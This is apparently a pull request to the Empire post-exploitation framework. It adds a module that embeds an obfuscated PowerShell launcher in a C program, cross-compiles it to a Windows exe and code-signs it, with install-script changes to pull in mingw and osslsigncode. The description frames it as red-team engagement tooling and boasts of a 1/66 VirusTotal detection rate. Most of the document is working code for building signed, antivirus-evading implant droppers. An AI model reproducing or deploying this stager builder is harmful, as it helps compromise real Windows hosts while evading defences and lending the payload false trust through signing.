### PR TITLE
Codesigned win32 exe stager

### DIFF
--- a/lib/common/stagers.py
+++ b/lib/common/stagers.py
@@ -132,6 +132,45 @@ class Stagers:
         else:
             print helpers.color("[!] Original .dll for arch %s does not exist!" % (arch))
 
+   def generate_exe(self, launcherCode, certPath):
+   
+   
+       cSourceCode = "#include <stdlib.h>\n void main(){system(\"start /b %s\");}" % (launcherCode)
+       f = open(self.mainMenu.installPath + "/data/misc/launcher.c", 'w')
+       f.write(cSourceCode)
+       f.close()
+       if certPath != '':
+           pemFile = ''
+           keyFile = ''
+           for f in os.listdir(self.mainMenu.installPath + certPath):
+               if f.endswith(".pem"):
+                   pemFile = os.path.join(self.mainMenu.installPath + certPath, f)
+               if f.endswith(".key"):
+                   keyFile = os.path.join(self.mainMenu.installPath + certPath, f)
+           if pemFile == '': 
+               print helpers.color("[!] Could not find .pem file!")
+               return ""
+           if keyFile == '':
+               return helpers.color("[!] Could not find .key file!")
+               return ""
+       
+                
+       os.path.isfile(self.mainMenu.installPath + "/data/misc/launcher.exe")
+   
+       os.system("i686-w64-mingw32-gcc -s %s -o %s" % (self.mainMenu.installPath + "/data/misc/launcher.c", self.mainMenu.installPath + "/data/misc/launcher.exe"))
+       if not os.path.isfile(self.mainMenu.installPath + "/data/misc/launcher.exe"):
+           print helpers.color("[!] Failed to compile exe!")
+           return ""
+       else:
+           print helpers.color("[-] Codesigning: ")
+           os.system("osslsigncode sign -certs %s -key %s -in %s -out %s" % (pemFile, keyFile, self.mainMenu.installPath + "/data/misc/launcher.exe", self.mainMenu.installPath + "/data/misc/signed-launcher.exe"))
+           exeFile = open(self.mainMenu.installPath + "/data/misc/signed-launcher.exe", 'rb')
+           exe = exeFile.read()
+           exeFile.close()
+           
+           os.remove(self.mainMenu.installPath + "/data/misc/signed-launcher.exe")
+           os.remove(self.mainMenu.installPath + "/data/misc/launcher.exe")
+           return exe
 
     def generate_macho(self, launcherCode):
         """

--- a/lib/common/stagers.py
+++ b/lib/common/stagers.py
@@ -132,45 +132,45 @@ class Stagers:
         else:
             print helpers.color("[!] Original .dll for arch %s does not exist!" % (arch))
 
-   def generate_exe(self, launcherCode, certPath):
+    def generate_exe(self, launcherCode, certPath):
    
    
-       cSourceCode = "#include <stdlib.h>\n void main(){system(\"start /b %s\");}" % (launcherCode)
-       f = open(self.mainMenu.installPath + "/data/misc/launcher.c", 'w')
-       f.write(cSourceCode)
-       f.close()
-       if certPath != '':
-           pemFile = ''
-           keyFile = ''
-           for f in os.listdir(self.mainMenu.installPath + certPath):
-               if f.endswith(".pem"):
-                   pemFile = os.path.join(self.mainMenu.installPath + certPath, f)
-               if f.endswith(".key"):
-                   keyFile = os.path.join(self.mainMenu.installPath + certPath, f)
-           if pemFile == '': 
-               print helpers.color("[!] Could not find .pem file!")
-               return ""
-           if keyFile == '':
-               return helpers.color("[!] Could not find .key file!")
-               return ""
+        cSourceCode = "#include <stdlib.h>\n void main(){system(\"start /b %s\");}" % (launcherCode)
+        f = open(self.mainMenu.installPath + "/data/misc/launcher.c", 'w')
+        f.write(cSourceCode)
+        f.close()
+        if certPath != '':
+            pemFile = ''
+            keyFile = ''
+            for f in os.listdir(self.mainMenu.installPath + certPath):
+                if f.endswith(".pem"):
+                    pemFile = os.path.join(self.mainMenu.installPath + certPath, f)
+                if f.endswith(".key"):
+                    keyFile = os.path.join(self.mainMenu.installPath + certPath, f)
+            if pemFile == '': 
+                print helpers.color("[!] Could not find .pem file!")
+                return ""
+            if keyFile == '':
+                return helpers.color("[!] Could not find .key file!")
+                return ""
        
                 
-       os.path.isfile(self.mainMenu.installPath + "/data/misc/launcher.exe")
+        os.path.isfile(self.mainMenu.installPath + "/data/misc/launcher.exe")
    
-       os.system("i686-w64-mingw32-gcc -s %s -o %s" % (self.mainMenu.installPath + "/data/misc/launcher.c", self.mainMenu.installPath + "/data/misc/launcher.exe"))
-       if not os.path.isfile(self.mainMenu.installPath + "/data/misc/launcher.exe"):
-           print helpers.color("[!] Failed to compile exe!")
-           return ""
-       else:
-           print helpers.color("[-] Codesigning: ")
-           os.system("osslsigncode sign -certs %s -key %s -in %s -out %s" % (pemFile, keyFile, self.mainMenu.installPath + "/data/misc/launcher.exe", self.mainMenu.installPath + "/data/misc/signed-launcher.exe"))
-           exeFile = open(self.mainMenu.installPath + "/data/misc/signed-launcher.exe", 'rb')
-           exe = exeFile.read()
-           exeFile.close()
+        os.system("i686-w64-mingw32-gcc -s %s -o %s" % (self.mainMenu.installPath + "/data/misc/launcher.c", self.mainMenu.installPath + "/data/misc/launcher.exe"))
+        if not os.path.isfile(self.mainMenu.installPath + "/data/misc/launcher.exe"):
+            print helpers.color("[!] Failed to compile exe!")
+            return ""
+        else:
+            print helpers.color("[-] Codesigning: ")
+            os.system("osslsigncode sign -certs %s -key %s -in %s -out %s" % (pemFile, keyFile, self.mainMenu.installPath + "/data/misc/launcher.exe", self.mainMenu.installPath + "/data/misc/signed-launcher.exe"))
+            exeFile = open(self.mainMenu.installPath + "/data/misc/signed-launcher.exe", 'rb')
+            exe = exeFile.read()
+            exeFile.close()
            
-           os.remove(self.mainMenu.installPath + "/data/misc/signed-launcher.exe")
-           os.remove(self.mainMenu.installPath + "/data/misc/launcher.exe")
-           return exe
+            os.remove(self.mainMenu.installPath + "/data/misc/signed-launcher.exe")
+            os.remove(self.mainMenu.installPath + "/data/misc/launcher.exe")
+            return exe
 
     def generate_macho(self, launcherCode):
         """

--- a/lib/stagers/windows/exe.py
+++ b/lib/stagers/windows/exe.py
@@ -1,0 +1,128 @@
+from lib.common import helpers
+
+class Stager:
+
+	def __init__(self, mainMenu, params=[]):
+
+		self.info = {
+			'Name': 'PE Launcher (.exe)',
+
+			'Author': ['@_vivami'],
+
+			'Description': ('Generate an x86 PE stager.'),
+
+			'Comments': [
+				''
+			]
+		}
+
+		# any options needed by the stager, settable during runtime
+		self.options = {
+			# format:
+			#   value_name : {description, required, default_value}
+			'Listener' : {
+				'Description'   :   'Listener to generate stager for.',
+				'Required'      :   True,
+				'Value'         :   ''
+			},
+			'Language' : {
+				'Description'   :   'Language of the stager to generate.',
+				'Required'      :   True,
+				'Value'         :   'powershell'
+			},
+			'Listener' : {
+				'Description'   :   'Listener to use.',
+				'Required'      :   True,
+				'Value'         :   ''
+			},
+			'StagerRetries' : {
+				'Description'   :   'Times for the stager to retry connecting.',
+				'Required'      :   False,
+				'Value'         :   '0'
+			},
+			'UserAgent' : {
+				'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
+				'Required'      :   False,
+				'Value'         :   'default'
+			},
+			'Proxy' : {
+				'Description'   :   'Proxy to use for request (default, none, or other).',
+				'Required'      :   False,
+				'Value'         :   'default'
+			},
+			'ProxyCreds' : {
+				'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
+				'Required'      :   False,
+				'Value'         :   'default'
+			},
+			'OutFile' : {
+				'Description'   :   'File to output dll to.',
+				'Required'      :   True,
+				'Value'         :   '/tmp/launcher.exe'
+			},
+			'Obfuscate' : {
+				'Description'   :   'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
+				'Required'      :   False,
+				'Value'         :   'False'
+			},
+			'ObfuscateCommand' : {
+				'Description'   :   'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
+				'Required'      :   False,
+				'Value'         :   r'Token\All\1'
+			},
+			'CertPath' : {
+				'Description'   :   'Sign the binary with a certificate. Path to cert. By default uses the Empire generated certificate.',
+				'Required'      :   False,
+				'Value'         :   '/data'
+			}
+		}
+
+		# save off a copy of the mainMenu object to access external functionality
+		#   like listeners/agent handlers/etc.
+		self.mainMenu = mainMenu
+
+		for param in params:
+			# parameter format is [Name, Value]
+			option, value = param
+			if option in self.options:
+				self.options[option]['Value'] = value
+
+
+	def generate(self):
+
+		listenerName = self.options['Listener']['Value']
+
+		# staging options
+		language = self.options['Language']['Value']
+		userAgent = self.options['UserAgent']['Value']
+		proxy = self.options['Proxy']['Value']
+		proxyCreds = self.options['ProxyCreds']['Value']
+		stagerRetries = self.options['StagerRetries']['Value']
+		obfuscate = self.options['Obfuscate']['Value']
+		obfuscateCommand = self.options['ObfuscateCommand']['Value']
+		certPath = self.options['CertPath']['Value']
+
+		if not self.mainMenu.listeners.is_listener_valid(listenerName):
+			# not a valid listener, return nothing for the script
+			print helpers.color("[!] Invalid listener: " + listenerName)
+			return ""
+		else:
+			obfuscateScript = False
+			if obfuscate.lower() == "true":
+				obfuscateScript = True
+
+			if obfuscateScript and "launcher" in obfuscateCommand.lower():
+				print helpers.color("[!] If using obfuscation, LAUNCHER obfuscation cannot be used in the dll stager.")
+				return ""
+			# generate the PowerShell one-liner with all of the proper options set
+			launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
+
+			if launcher == "":
+				print helpers.color("[!] Error in launcher generation.")
+				return ""
+			else:
+				
+				exe = self.mainMenu.stagers.generate_exe(launcher, certPath)
+				
+				return exe
+

--- a/setup/install.sh
+++ b/setup/install.sh
@@ -21,7 +21,7 @@ fi
 version=$( lsb_release -r | grep -oP "[0-9]+" | head -1 )
 if lsb_release -d | grep -q "Fedora"; then
 	Release=Fedora
-	dnf install -y make g++ python-devel m2crypto python-m2ext swig python-iptools python3-iptools libxml2-devel default-jdk openssl-devel libssl1.0.0 libssl-dev
+	dnf install -y make g++ python-devel m2crypto python-m2ext swig python-iptools python3-iptools libxml2-devel default-jdk openssl-devel libssl1.0.0 libssl-dev gcc-mingw-w64-i686
 	pip install --upgrade urllib3
 	pip install setuptools
 	pip install pycrypto
@@ -40,7 +40,7 @@ elif lsb_release -d | grep -q "Kali"; then
       echo "deb http://security.debian.org/debian-security wheezy/updates main" >> /etc/apt/sources.list
     fi
     apt-get update
-	apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl1.0.0 libssl-dev
+	apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl1.0.0 libssl-dev gcc-mingw-w64-i686
 	pip install --upgrade urllib3
 	pip install setuptools
 	pip install pycrypto
@@ -80,7 +80,7 @@ elif lsb_release -d | grep -q "Kali"; then
         cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules
 elif lsb_release -d | grep -q "Ubuntu"; then
 	Release=Ubuntu
-	apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl1.0.0 libssl-dev
+	apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl1.0.0 libssl-dev gcc-mingw-w64-i686
 	pip install --upgrade urllib3
 	pip install setuptools
 	pip install pycrypto
@@ -109,7 +109,7 @@ elif lsb_release -d | grep -q "Ubuntu"; then
         cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules
 else
 	echo "Unknown distro - Debian/Ubuntu Fallback"
-	 apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev libssl1.0.0 libssl-dev
+	 apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev libssl1.0.0 libssl-dev gcc-mingw-w64-i686
 	 pip install --upgrade urllib3
 	 pip install setuptools
 	 pip install pycrypto

--- a/setup/install.sh
+++ b/setup/install.sh
@@ -21,7 +21,7 @@ fi
 version=$( lsb_release -r | grep -oP "[0-9]+" | head -1 )
 if lsb_release -d | grep -q "Fedora"; then
 	Release=Fedora
-	dnf install -y make g++ python-devel m2crypto python-m2ext swig python-iptools python3-iptools libxml2-devel default-jdk openssl-devel libssl1.0.0 libssl-dev gcc-mingw-w64-i686
+	dnf install -y make g++ python-devel m2crypto python-m2ext swig python-iptools python3-iptools libxml2-devel default-jdk openssl-devel libssl1.0.0 libssl-dev gcc-mingw-w64-i686 osslsigncode
 	pip install --upgrade urllib3
 	pip install setuptools
 	pip install pycrypto
@@ -40,7 +40,7 @@ elif lsb_release -d | grep -q "Kali"; then
       echo "deb http://security.debian.org/debian-security wheezy/updates main" >> /etc/apt/sources.list
     fi
     apt-get update
-	apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl1.0.0 libssl-dev gcc-mingw-w64-i686
+	apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl1.0.0 libssl-dev gcc-mingw-w64-i686 osslsigncode
 	pip install --upgrade urllib3
 	pip install setuptools
 	pip install pycrypto
@@ -80,7 +80,7 @@ elif lsb_release -d | grep -q "Kali"; then
         cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules
 elif lsb_release -d | grep -q "Ubuntu"; then
 	Release=Ubuntu
-	apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl1.0.0 libssl-dev gcc-mingw-w64-i686
+	apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl1.0.0 libssl-dev gcc-mingw-w64-i686 osslsigncode
 	pip install --upgrade urllib3
 	pip install setuptools
 	pip install pycrypto
@@ -109,7 +109,7 @@ elif lsb_release -d | grep -q "Ubuntu"; then
         cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules
 else
 	echo "Unknown distro - Debian/Ubuntu Fallback"
-	 apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev libssl1.0.0 libssl-dev gcc-mingw-w64-i686
+	 apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev libssl1.0.0 libssl-dev gcc-mingw-w64-i686 osslsigncode
 	 pip install --upgrade urllib3
 	 pip install setuptools
 	 pip install pycrypto

--- a/setup/install.sh
+++ b/setup/install.sh
@@ -21,7 +21,7 @@ fi
 version=$( lsb_release -r | grep -oP "[0-9]+" | head -1 )
 if lsb_release -d | grep -q "Fedora"; then
 	Release=Fedora
-	dnf install -y make g++ python-devel m2crypto python-m2ext swig python-iptools python3-iptools libxml2-devel default-jdk openssl-devel libssl1.0.0 libssl-dev gcc-mingw-w64-i686 osslsigncode
+	dnf install -y make g++ python-devel m2crypto python-m2ext swig python-iptools python3-iptools libxml2-devel default-jdk openssl-devel libssl1.0.0 libssl-dev mingw32-gcc osslsigncode
 	pip install --upgrade urllib3
 	pip install setuptools
 	pip install pycrypto


### PR DESCRIPTION
I've had to create an exe with a stager a few times now on an engagement (for example for manual service binary replacements), so I decided to create a stager that does this for me. It compiles an exe using 32-bit mingw and then codesigns the generated stager exe using osslsigncode (the operator can choose to sign with the default Empire .pem or supply their own cert).

A downside of this module is the added footprint of 206MB to Empire (that's why this only uses 32-bit mingw and not the full mingw). I tried to explore other paths, but mingw appears to be the only cross-compiler able to generate single exe files. Maybe "inline" binary editing of an exe template would work (like the dll stager), but I have not experience with that, so that would take me some more time.

BTW: generated exe's have a [1/66 VT detection](https://www.virustotal.com/#/file/0c2154d60c6edc88355406a712bed2cb8472fe1496eb16169c40adaa5dcc2e2f/detection) rate.